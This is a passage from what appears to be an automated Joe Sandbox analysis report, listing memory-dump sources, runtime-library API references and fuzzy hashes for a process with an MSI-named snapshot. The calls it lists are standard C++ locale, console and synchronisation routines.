                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE974
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE97E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE9CF
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE9EF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEA09
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEA13
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEA64
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEA84
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEBC8
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEBD2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEC23
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEC43
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2BBC
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2BC6
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2C17
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2C37
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2CE6
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2CF0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2D41
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2D61
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEC5D
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEC67
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCECB8
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCECD8
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2C51
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2C5B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2CAC
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2CCC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2EA5
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2EAF
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2F00
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2F20
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2E10
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2E1A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2E6B
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2E8B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2F3A
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2F44
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2F95
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2FB5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000), ref: 00FF369D
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?,?,?,00FF271F,?), ref: 00FF36A9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FF366F: CloseHandle.KERNEL32(FFFFFFFE,00FF36B9,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?,?), ref: 00FF367F
                                                                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 00FF36B9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FF3631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FF3660,00FF3040,?,?,00FF2198,?,?,00000000,?), ref: 00FF3644
                                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?), ref: 00FF36CE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,00FD2CBD,00000064), ref: 00FD2D43
                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D4D
                                                                                                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D5E
                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0100DD3C,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D65
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9107ed09de7c810045b101a10948d63428ee6f7b21d6f71ed536433eec1437e0
                                                                                                                                                                                                                                                                      • Instruction ID: 42568e59eef2f7675212bdd1cae22484f930d244300e3c52fa2fcbe10b853763
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9107ed09de7c810045b101a10948d63428ee6f7b21d6f71ed536433eec1437e0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0D832505628BBDB233BC4EC08AAE7F2EEF04B11F040053F54666171CB650A00EBF2
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FBEC8E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: __EH_prolog3.LIBCMT ref: 00FBD883
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: std::_Lockit::_Lockit.LIBCPMT ref: 00FBD88D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD8FE
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FBEE8A
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FBECF6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: b88b8a52d6b50230c0e1242dd2ac9e771c26d84e7c297d169c6b2ac10df1accb
                                                                                                                                                                                                                                                                      • Instruction ID: abfd76e5e42950eea06d34a9774fdd0ce98eb7dfd97c357453383f3312a12130
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b88b8a52d6b50230c0e1242dd2ac9e771c26d84e7c297d169c6b2ac10df1accb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCC1A034E042888EDF25DFA5C9407FCBBB2AF55310F2840A9E8856B287CB749D46EF51
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC62C8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: __EH_prolog3.LIBCMT ref: 00FC2D7B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: std::_Lockit::_Lockit.LIBCPMT ref: 00FC2D85
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2DF6
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FC6502
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FC633F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: 47053bb784ad00e024fee3f359785e205074ecc8e01cfdc16ee06f3dd49cafb5
                                                                                                                                                                                                                                                                      • Instruction ID: 1e2e1cdab164f431c09c2891385cf9c19a1b65b5e940d60597a64ae693089eb8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47053bb784ad00e024fee3f359785e205074ecc8e01cfdc16ee06f3dd49cafb5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1C670E0825A8BDF25DF64CA42FACBBB1BF54314F58809DD845EB286DB349C85EB50
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC669E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00FBB8DD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00FBB900
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB928
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB9B7
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FC68D8
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FC6715
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: 3cbbc0dd53b7d193b0bc61761a93fe069c63dd17ccc0cf0e657d8e29e2acd675
                                                                                                                                                                                                                                                                      • Instruction ID: 4d37766df30196eb11d7b4bbb2a20bccc582316538ad0dbb74a40b850dd95d32
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cbbc0dd53b7d193b0bc61761a93fe069c63dd17ccc0cf0e657d8e29e2acd675
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EC19630D0825A8BDF25DF64CA46BBCBBB2BF55314F54809DD485EB282DB348D85EB50
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FE1AFD
                                                                                                                                                                                                                                                                      Strings
